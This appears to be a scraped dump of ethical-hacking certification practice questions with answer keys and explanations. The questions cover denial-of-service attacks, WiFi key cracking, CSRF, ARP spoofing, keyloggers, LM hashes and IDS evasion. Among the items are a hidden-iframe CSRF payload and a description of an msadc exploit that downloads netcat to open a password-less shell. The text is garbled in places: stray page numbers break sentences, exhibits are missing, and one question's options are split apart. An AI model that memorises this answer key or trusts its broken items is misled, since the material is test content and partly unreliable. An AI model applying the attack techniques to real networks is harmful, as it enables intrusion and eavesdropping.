574 Theresa is an IT security analyst working for the United Kingdom Internet Crimes Bureau in London. Theresa has been assigned to the software piracy division which focuses on taking down individual and organized groups that distribute copyrighted software illegally. Theresa and her division have been responsible for taking down over 2,000 FTP sites hosting copyrighted software. Theresa's supervisor now wants her to focus on finding and taking down websites that host illegal pirated software. What are these sights called that Theresa has been tasked with taking down? A. These sites that host illegal copyrighted software are called Warez sites B. These sites that Theresa has been tasked to take down are called uTorrent sites C. These websites are referred to as Dark Web sites D. Websites that host illegal pirated versions of software are called Back Door sites

A (Explanation: The Warez scene, often referred to as The Scene (often capitalized) is a term of self-reference used by a community that specializes in the underground distribution of pirated content, typically software but increasingly including movies and music.)

439 What is the expected result of the following exploit? 263 A. Opens up a telnet listener that requires no username or password. B. Create a FTP server with write permissions enabled. C. Creates a share called "sasfile" on the target system. D. Creates an account with a user name of Anonymous and a password of [email protected].

A (Explanation: The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) -- $port, $your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username, and FTP password. $host is set to argument variable 0 (which means the string typed directly after the command). Essentially what happens is it connects to an FTP server and downloads nc.exe (the TCP/IP swiss-army knife -- netcat) and uses nc to open a TCP port spawning cmd.exe (cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NO username or password and has the permissions of the username it is being executed as (probably guest in this instance, although it could be administrator). The #'s in the script means the text following is a comment, notice the last line in particular, if the # was removed the script would spawn a connection to itself, the host system it was running on.)

281 What happens during a SYN flood attack? A. TCP connection requests floods a target machine is flooded with randomized source address & ports for the TCP ports. B. A TCP SYN packet, which is a connection initiation, is sent to a target machine, giving the target host's address as both source and destination, and is using the same port on the target host 169 as both source and destination. C. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field. D. A TCP packet is received with both the SYN and the FIN bits set in the flags field.

A (Explanation: To a server that requires an exchange of a sequence of messages. The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending a SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message and then data can be exchanged. At the point where the server system has sent an acknowledgment (SYN-ACK) back to client but has not yet received the ACK message, there is a half-open connection. A data structure describing all pending connections is in memory of the server that can be made to overflow by intentionally creating too many partially open connections. Another common attack is the SYN flood, in which a target machine is flooded with TCP connection requests. The source addresses and source TCP ports of the connection request packets are randomized; the purpose is to force the target host to maintain state information for many connections that will never be completed. SYN flood attacks are usually noticed because the target host (frequently an HTTP or SMTP server) becomes extremely slow, crashes, or hangs. It's also possible for the traffic returned from the target host to cause trouble on routers; because this return traffic goes to the randomized source addresses of the original packets, it lacks the locality properties of "real" IP traffic, and may overflow route caches. On Cisco routers, this problem often manifests itself in the router running out of memory.)

264 This tool is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools. Which of the following tools is being described? A. Aircrack-ng B. Airguard C. WLAN-crack D. wificracker

A (Explanation: Aircrack-ng is a complete suite of tools to assess WiFi network security. The default cracking method of Aircrack-ng is PTW, but Aircrack-ng can also use the FMS/KoreK method, which incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing. References: http://www.aircrack-ng.org/doku.php?id=aircrack-ng)

257 An attacker changes the profile information of a particular user (victim) on the target website. The attacker uses this string to update the victim's profile to a text file and then submit the data to the attacker's database. <iframe src="http://www.vulnweb.com/updateif.php" style="display:none"></iframe> What is this type of attack (that can use either HTTP GET or HTTP POST) called? A. Cross-Site Request Forgery B. Cross-Site Scripting C. SQL Injection D. Browser Hacking

A (Explanation: Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Different HTTP request methods, such as GET and POST, have different level of susceptibility to CSRF attacks and require different levels of protection due to their different handling by web browsers. References: https://en.wikipedia.org/wiki/Cross-site_request_forgery)

357 Which of the following statements regarding ethical hacking is incorrect? A. Ethical hackers should never use tools or methods that have the potential of exploiting vulnerabilities in an organization's systems. B. Testing should be remotely performed offsite C. An organization should use ethical hackers who do not sell vendor hardware/software or other consulting services. D. Ethical hacking should not involve writing to or modifying the target systems.

A (Explanation: Ethical hackers use the same methods and techniques, including those that have the potential of exploiting vulnerabilities, to test and bypass a system's defenses as their less-principled counterparts, but rather than taking advantage of any vulnerabilities found, they document them and provide actionable advice on how to fix them so the organization can improve its overall security. References: http://searchsecurity.techtarget.com/definition/ethical-hacker)

326 A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software as many of the other clients on the network. The client can see the network, but cannot connect. A wireless packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requests being sent by the wireless client. What is a possible source of this problem? A. The WAP does not recognize the client's MAC address B. The client cannot see the SSID of the wireless network C. Client is configured for the wrong channel D. The wireless client is not configured to use DHCP

A (Explanation: MAC Filtering (or GUI filtering, or layer 2 address filtering) refers to a security access control method whereby the 48-bit address assigned to each network card is used to determine access to the network. MAC Filtering is often used on wireless networks. References: https://en.wikipedia.org/wiki/MAC_filtering)

453 Clive is conducting a pen-test and has just port scanned a system on the network. He has identified the operating system as Linux and been able to elicit responses from ports 23, 25 and 53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as running DNS service. The client confirms these findings and attests to the current availability of the services. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typing other commands, he sees only blank spaces or underscores symbols on the screen. What are you most likely to infer from this? A. The services are protected by TCP wrappers B. There is a honeypot running on the scanned machine C. An attacker has replaced the services with trojaned ones D. This indicates that the telnet and SMTP server have crashed 272

A (Explanation: (Explanation: TCP Wrapper is a host-based network ACL system, used to filter network access to Internet protocol services run on (Unix-like) operating systems such as Linux or BSD. It allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens on which to filter for access control purposes.)

479 You are doing IP spoofing while you scan your target. You find that the target has port 23 open.Anyway you are unable to connect. Why? A. A firewall is blocking port 23 B. You cannot spoof + TCP C. You need an automated telnet tool D. The OS does not reply to telnet even if port 23 is open

A (Explanation: (Explanation: The question is not telling you what state the port is being reported by the scanning utility, if the program used to conduct this is nmap, nmap will show you one of three states - "open", "closed", or "filtered" a port can be in an "open" state yet filtered, usually by a stateful packet inspection filter (ie. Netfilter for linux, ipfilter for bsd). C and D to make any sense for this question, their bogus, and B, "You cannot spoof + TCP", well you can spoof + TCP, so we strike that out.)

23 You receive an email with the following message: Hello Steve, We are having technical difficulty in restoring user database record after the recent blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password. http://[email protected]/support/logon.htm If you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services. Sincerely, 14 Technical Support SuperEmailServices From this e-mail you suspect that this message was sent by some hacker since you have been using their e-mail services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers. You immediately enter the following at Windows 2000 command prompt: Ping 0xde.0xad.0xbe.0xef You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL? A. 222.173.190.239 B. 233.34.45.64 C. 54.23.56.55 D. 199.223.23.45

A (Explanation: 0x stands for hexadecimal and DE=222, AD=173, BE=190 and EF=239)

257 John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame? A. 0xFFFFFFFFFFFF B. 0xAAAAAAAAAAAA C. 0xBBBBBBBBBBBB D. 0xDDDDDDDDDDDD

A (Explanation: 0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame. 155)

159 Which of the following represents the initial two commands that an IRC client sends to join an IRC network? A. USER, NICK B. LOGIN, NICK C. USER, PASS D. LOGIN, USER

A (Explanation: A "PASS" command is not required for either client or server connection to be registered, but it must precede the server message or the latter of the NICK/USER combination. (RFC 1459))

188 This kind of password cracking method uses word lists in combination with numbers and special characters: A. Hybrid B. Linear C. Symmetric D. Brute Force

A (Explanation: A Hybrid (or Hybrid Dictionary) Attack uses a word list that it modifies slightly to find passwords that are almost from a dictionary (like St0pid))

243 Which definition below best describes a covert channel? A. Making use of a Protocol in a way it was not intended to be used B. It is the multiplexing taking place on communication link C. It is one of the weak channels used by WEP that makes it insecure D. A Server Program using a port that is not well known

A (Explanation: A covert channel is a hidden communication channel not intended for information transfer at all. Redundancy can often be used to communicate in a covert way. There are several ways that hidden communication can be set up.)

263 How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network? A. Covert Channel B. Crafted Channel C. Bounce Channel D. Deceptive Channel

A (Explanation: A covert channel is described as: "any communication channel that can be exploited by a process to transfer information in a manner that violates the systems security policy." Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information. 158)

377 You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker? A. 5 minutes B. 23 days C. 200 years D. 16 million years

A (Explanation: A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. As long as you use a word found in or similar to a word found in a dictionary the password is considered to be weak.)

295 Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address. She launches an attack similar to that of fraggle. What is the technique that Eve used in the case above? A. Smurf B. Bubonic C. SYN Flood D. Ping of Death

A (Explanation: A fraggle attack is a variation of the smurf attack for denial of service in which the attacker sends spoofed UDP packets instead of ICMP echo reply (ping) packets to the broadcast address of a large network. 177)

433 Which of the following keyloggers can't be detected by anti-virus or anti-spyware products? A. Hardware keylogger B. Software Keylogger C. Stealth Keylogger D. Convert Keylogger

A (Explanation: A hardware keylogger will never interact with the operating system and therefore it will never be detected by any security programs running in the operating system.)

144 85 What is a NULL scan? A. A scan in which all flags are turned off B. A scan in which certain flags are off C. A scan in which all flags are on D. A scan in which the packet size is set to zero E. A scan with a illegal packet size

A (Explanation: A null scan has all flags turned off.)

302 Steven, a security analyst for XYZ associates, is analyzing packets captured by Ethereal on a Linux Server inside his network when the server starts to slow down tremendously. Steven examines the following Ethereal captures: 181 A. Smurf Attack B. ARP Spoofing C. Ping of Death D. SYN Flood

A (Explanation: A perpetrator is sending a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. Topic 9, Social Engineering)

220 LAN Manager passwords are concatenated to 14 bytes and split in half. The two halves are hashed individually. If the password is 7 characters or less, than the second half of the hash is always: A. 0xAAD3B435B51404EE B. 0xAAD3B435B51404AA C. 0xAAD3B435B51404BB D. 0xAAD3B435B51404CC

A (Explanation: A problem with LM stems from the total lack of salting or cipher block chaining in the 131 hashing process. To hash a password the first 7 bytes of it are transformed into an 8 byte odd parity DES key. This key is used to encrypt the 8 byte string "KGS!@". Same thing happens with the second part of the password. This lack of salting creates two interesting consequences. Obviously this means the password is always stored in the same way, and just begs for a typical lookup table attack. The other consequence is that it is easy to tell if a password is bigger than 7 bytes in size. If not, the last 7 bytes will all be null and will result in a constant DES hash of 0xAAD3B435B51404EE.)

206 What hacking attack is challenge/response authentication used to prevent? 122 A. Replay attacks B. Scanning attacks C. Session hijacking attacks D. Password cracking attacks

A (Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it. With a challenge/response authentication you ensure that captured packets can't be retransmitted without a new authentication.)

222 Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or decoding the hash. A. Replay Attacks B. Brute Force Attacks C. Cryptography Attacks D. John the Ripper Attacks

A (Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.)

221 Travis works primarily from home as a medical transcriptions. He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM. He uses voice recognition software is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus software, anti-spyware software and always keeps the computer upto- date with Microsoft patches. After another month of working on the computer, Travis computer is even more noticeable slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it and he depends on it to work. Travis scans his through Windows Explorer and check out the file system, folder by folder to see if there is anything he can find. He spends over four hours pouring over the files and folders and can't find anything but before he gives up, he notices that his computer only has about 10 GB of free space available. Since has drive is a 200 GB hard drive, Travis thinks this is very odd. Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travi's problems? A. Travis's Computer is infected with stealth kernel level rootkit B. Travi's Computer is infected with Stealth Torjan Virus 132 C. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space D. Logic Bomb's triggered at random times creating hidden data consuming junk files

A (Explanation: A rootkit can take full control of a system. A rootkit's only purpose is to hide files, network connections, memory addresses, or registry entries from other programs used by system administrators to detect intended or unintended special privilege accesses to the computer resources.)

432 Joseph has just been hired on to a contractor company of the Department of Defense as their senior Security Analyst. Joseph has been instructed on the Company's strict security policies that have been implemented and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use twofactor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication? 258 A. Security token B. Biometric device C. OTP D. Proximity cards

A (Explanation: A security token (sometimes called an authentication token) is a small hardware device that the owner carries to authorize access to a network service. The device may be in the form of a smart card or may be embedded in a commonly used object such as a key fob. Security tokens provide an extra level of assurance through a method known as two-factor authentication: the user has a personal identification number (PIN), which authorizes them as the owner of that particular device; the device then displays a number which uniquely identifies the user to the service, allowing them to log in.)

9 Steven works as a security consultant and frequently performs penetration tests for Fortune 500 companies. Steven runs external and internal tests and then creates reports to show the companies where their weak areas are. Steven always signs a non-disclosure agreement before performing his tests. What would Steven be considered? A. Whitehat Hacker B. BlackHat Hacker C. Grayhat Hacker D. Bluehat Hacker

A (Explanation: A white hat hacker, also rendered as ethical hacker, is, in the realm of information technology, a person who is ethically opposed to the abuse of computer systems. Realization that the Internet now represents human voices from around the world has made the defense of its integrity an important pastime for many. A white hat generally focuses on securing IT systems, whereas a black hat (the opposite) would like to break into them.)

268 161 Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around but the program he is using does not seem to be capturing anything. He pours through the sniffer's manual but can't find anything that directly relates to his problem. Harold decides to ask the network administrator if the has any thoughts on the problem. Harold is told that the sniffer was not working because the agency's network is a switched network, which can't be sniffed by some programs without some tweaking. What technique could Harold use to sniff agency's switched network? A. ARP spoof the default gateway B. Conduct MiTM against the switch C. Launch smurf attack against the switch D. Flood switch with ICMP packets

A (Explanation: ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).)

274 165 Bob is conducting a password assessment for one of his clients. Bob suspects that password policies are not in place and weak passwords are probably the norm throughout the company he is evaluating. Bob is familiar with password weakness and key loggers. What are the means that Bob can use to get password from his client hosts and servers? A. Hardware, Software and Sniffing B. Hardware and Software Keyloggers C. Software only, they are the most effective D. Passwords are always best obtained using Hardware key loggers

A (Explanation: All loggers will work as long as he has physical access to the computers. Topic 8, Denial of Service)

515 Angela is trying to access an education website that requires a username and password to login. When Angela clicks on the link to access the login page, she gets an error message stating that the page can't be reached. She contacts the website's support team and they report that no one else is having any issues with the site. After handing the issue over to her company's IT department, it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education's server. Since Angela's computer is behind a corporate firewall, her computer can't ping the education website back. What ca Angela's IT department do to get access to the education website? A. Change the IP on Angela's Computer to an address outside the firewall B. Change the settings on the firewall to allow all incoming traffic on port 80 C. Change the settings on the firewall all outbound traffic on port 80 D. Use a Internet browser other than the one that Angela is currently using

A (Explanation: Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses ICMP. The browser used by the user will not make any difference. The only alternative here that would solve the problem is to move the computer to outside the firewall.)

483 If you come across a sheepdip machine at your client's site, what should you do? A. A sheepdip computer is used only for virus-checking. B. A sheepdip computer is another name for a honeypot C. A sheepdip coordinates several honeypots. 291 D. A sheepdip computers defers a denial of service attack.

A (Explanation: Also known as a footbath, a sheepdip is the process of checking physical media, such as floppy disks or CD-ROMs, for viruses before they are used in a computer. Typically, a computer that sheepdips is used only for that process and nothing else and is isolated from the other computers, meaning it is not connected to the network. Most sheepdips use at least two different antivirus programs in order to increase effectiveness.)

484 If you come across a sheepdip machaine at your client site, what would you infer? A. A sheepdip computer is used only for virus checking. B. A sheepdip computer is another name for honeypop. C. A sheepdip coordinates several honeypots. D. A sheepdip computer defers a denial of service attack.

A (Explanation: Also known as a footbath, a sheepdip is the process of checking physical media, such as floppy disks or CD-ROMs, for viruses before they are used in a computer. Typically, a computer that sheepdips is used only for that process and nothing else and is isolated from the other computers, meaning it is not connected to the network. Most sheepdips use at least two different antivirus programs in order to increase effectiveness.)

114 Mark works as a contractor for the Department of Defense and is in charge of network security. He has spent the last month securing access to his network from all possible entry points. He has segmented his network into several subnets and has installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Mark is fairly confident of his perimeter defense, but is still worried about programs like Hping2 that can get into a network through convert channels. How should mark protect his network from an attacker using Hping2 to scan his internal network? A. Blocking ICMP type 13 messages B. Block All Incoming traffic on port 53 C. Block All outgoing traffic on port 53 D. Use stateful inspection on the firewalls

A (Explanation: An ICMP type 13 message is an ICMP timestamp request and waits for an ICMP timestamp reply. The remote node is right to do, still it would not be necessary as it is optional and thus many ip stacks ignore such packets. Nevertheless, nmap again achived to make its packets unique by setting the originating timestamp field in the packet to 0. 67)

219 Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. He is confident that this rule will secure his network hackers on the Internet. But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use. 130 Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder's attempts. Samuel wants to completely block hackers brute force attempts on his network. What are the alternatives to defending against possible brute-force password attacks on his site? A. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually C. Enforce complex password policy on your network so that passwords are more difficult to brute force D. You can't completely block the intruders attempt if they constantly switch proxies

D (Explanation: Without knowing from where the next attack will come there is no way of proactively block the attack. This is becoming a increasing problem with the growth of large bot nets using ordinary workstations and home computers in large numbers.)

244 Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers. "The hackers had accessed and downloaded 90,000 address containing customer credit cards and password. Spears Technology found this attack to be so to law enforcement officials to protect their intellectual property. How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technology, Inc's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "Back Door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. 146 The hackers were traced back to Beijing China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technology's network from a remote location, posing as employees. The intent of the attacker was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology, Inc exchange for ransom. The hackers had intended on selling the stolen VOIP software source code to competitors. How would you prevent such attacks from occurring in the future at Spears Technology? A. Disable VPN access to all your employees from home machines B. Allow VPN access but replace the standard authentication with biometric authentication C. Replace the VPN access with dial-up modem access to the company's network D. Enable 25 character complex password policy for employees to access the VPN network.

A (Explanation: As long as there is a way in for employees through all security measures you can't be secure because you never know what computer the employees use to access recourses at their workplace.)

58 home/root # traceroute www.targetcorp.com <http://www.targetcorp.com> 35 traceroute to www.targetcorp.com <http://www.targetcorp.com> (192.168.12.18), 64 hops may, 40 byte packets 1 router.anon.com (192.13.212.254) 1.373 ms 1.123 ms 1.280 ms 2 192.13.133.121 (192.13.133.121) 3.680 ms 3.506 ms 4.583 ms 3 firewall.anon.com (192.13.192.17) 127.189 ms 257.404 ms 208.484 ms 4 anon-gw.anon.com (192.93.144.89) 471.68 ms 376.875 ms 228.286 ms 5 fe5-0.lin.isp.com (192.162.231.225) 2.961 ms 3.852 ms 2.974 ms 6 fe0-0.lon0.isp.com (192.162.231.234) 3.979 ms 3.243 ms 4.370 ms 7 192.13.133.5 (192.13.133.5) 11.454 ms 4.221 ms 3.333 ms 6 * * * 7 * * * 8 www.targetcorp.com <http://www.targetcorp.com> (192.168.12.18) 5.392 ms 3.348 ms 3.199 ms Use the traceroute results shown above to answer the following question: The perimeter security at targetcorp.com does not permit ICMP TTL-expired packets out. A. True B. False

A (Explanation: As seen in the exhibit there is 2 registrations with timeout, this tells us that the firewall filters packets where the TTL has reached 0, when you continue with higher starting values for TTL you will get an answer from the target of the traceroute.)

553 Microsoft Authenticode technology is used for: A. Digital Signing Activex controls B. Digitally signing SSL Certificates C. Digitally Signing JavaScript Files D. Digitally Signing Java Applets

A (Explanation: Authenticode identifies the publisher of signed software and verifies that it hasn't been tampered with, before users download software to their PCs. As a result, end users can make a more informed decision as to whether or not to download code. Authenticode relies on digital certificates and is based on specifications that have been used successfully in the industry for some time, including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10 (certificate request formats), X.509 (certificate specification), and Secure Hash Algorithm (SHA) and MD5 hash algorithms. 336)

291 When working with Windows systems, what is the RID of the true administrator account? A. 500 B. 501 C. 1000 D. 1001 E. 1024 F. 512

A (Explanation: Because of the way in which Windows functions, the true administrator account always has a RID of 500.)

194 When discussing passwords, what is considered a brute force attack? A. You attempt every single possibility until you exhaust all possible combinations or discover the password B. You threaten to use the rubber hose on someone unless they reveal their password C. You load a dictionary of words into your cracking program D. You create hashes of a large number of words and compare it with the encrypted passwords E. You wait until the password expires

A (Explanation: Brute force cracking is a time consuming process where you try every possible combination of letters, numbers, and characters until you discover a match.)

521 The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds. What kind of attack is this program susceptible to? A. Buffer of Overflow B. Denial of Service C. Shatter Attack D. Password Attack

A (Explanation: C users must avoid using dangerous functions that do not check bounds unless they've ensured that the bounds will never get exceeded. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program.)

527 StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use _____ defense against buffer overflow attacks. A. Canary B. Hex editing C. Format checking D. Non-executing stack

A (Explanation: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. This is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.)

214 _____ is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another. A. Canonicalization B. Character Mapping C. Character Encoding D. UCS transformation formats

A (Explanation: Canonicalization (abbreviated c14n) is the process of converting data that has more than one possible representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures (e.g., in combinatorics), to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order. 126)

465 An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. 279 Which of the following strategies can be used to defeat detection by a network-based IDS application? (Choose the best answer) A. Create a network tunnel. B. Create a multiple false positives. C. Create a SYN flood. D. Create a ping flood.

A (Explanation: Certain types of encryption presents challenges to network-based intrusion detection and may leave the IDS blind to certain attacks, where a host-based IDS analyzes the data after it has been decrypted.)

498 Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload? A. Defrag B. Tcpfrag C. Tcpdump D. Fragroute

D (Explanation: fragroute intercepts, modifies, and rewrites egress traffic destined for a specified 302 host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour.)

7 The United Kingdom (UK) he passed a law that makes hacking into an unauthorized network a felony. The law states: Section1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured 4 is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-graden hacking. Section 2 of the deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offense (any offence which attacks a custodial sentence of more than five years, not necessarily one covered but the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed. Section 3 Offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For conviction to succeed there must have been the intent to cause the modifications and knowledge that the modification had not been authorized What is the law called? A. Computer Misuse Act 1990 B. Computer incident Act 2000 C. Cyber Crime Law Act 2003 D. Cyber Space Crime Act 1995

A (Explanation: Computer Misuse Act (1990) creates three criminal offences:)

178 Bob is doing a password assessment for one of his clients. Bob suspects that security policies are not in place. He also suspects that weak passwords are probably the norm throughout the company he is evaluating. Bob is familiar with password weaknesses and key loggers. Which of the following options best represents the means that Bob can adopt to retrieve passwords from his clients hosts and servers. A. Hardware, Software, and Sniffing. B. Hardware and Software Keyloggers. C. Passwords are always best obtained using Hardware key loggers. D. Software only, they are the most effective.

A (Explanation: Different types of keylogger planted into the environment would retrieve the passwords for Bob..)

533 In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code? A. EIP B. ESP C. EAP D. EEP

A (Explanation: EIP is the instruction pointer which is a register, it points to your next command. 325)

265 159 You are sniffing as unprotected WiFi network located in a JonDonalds Cybercafe with Ethereal to capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while snipping brewed coffee from JonDonalds. You want to sniff their email message traversing the unprotected WiFi network. Which of the following ethereal filters will you configure to display only the packets with the hotmail messages? A. (http contains "hotmail") && ( http contains "Reply-To") B. (http contains "e-mail" ) && (http contains "hotmail") C. (http = "login.passport.com" ) && (http contains "SMTP") D. (http = "login.passport.com" ) && (http contains "POP3")

A (Explanation: Each Hotmail message contains the tag Reply-To:<sender address> and "xxxx-xxxxxx. xxxx.hotmail.com" in the received tag.)

370 _____ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at. A. Mandatory Access Control B. Authorized Access Control C. Role-based Access Control D. Discretionary Access Control

A (Explanation: Explanation : In computer security, mandatory access control (MAC) is a kind of access control, defined by the TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity.")

29 Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? Select the best answer. A. There are two external DNS Servers for Internet domains. Both are AD integrated. B. All external DNS is done by an ISP. C. Internal AD Integrated DNS servers are using private DNS names that are D. unregistered. E. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.

A (Explanation: Explanations: A. There are two external DNS Servers for Internet domains. Both are AD integrated. This is the correct answer. Having an AD integrated DNS external server is a serious cause for alarm. There is no need for this and it causes vulnerability on the network. B. All external DNS is done by an ISP. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk as it is offloaded onto the ISP. C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk. 18 D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk.)

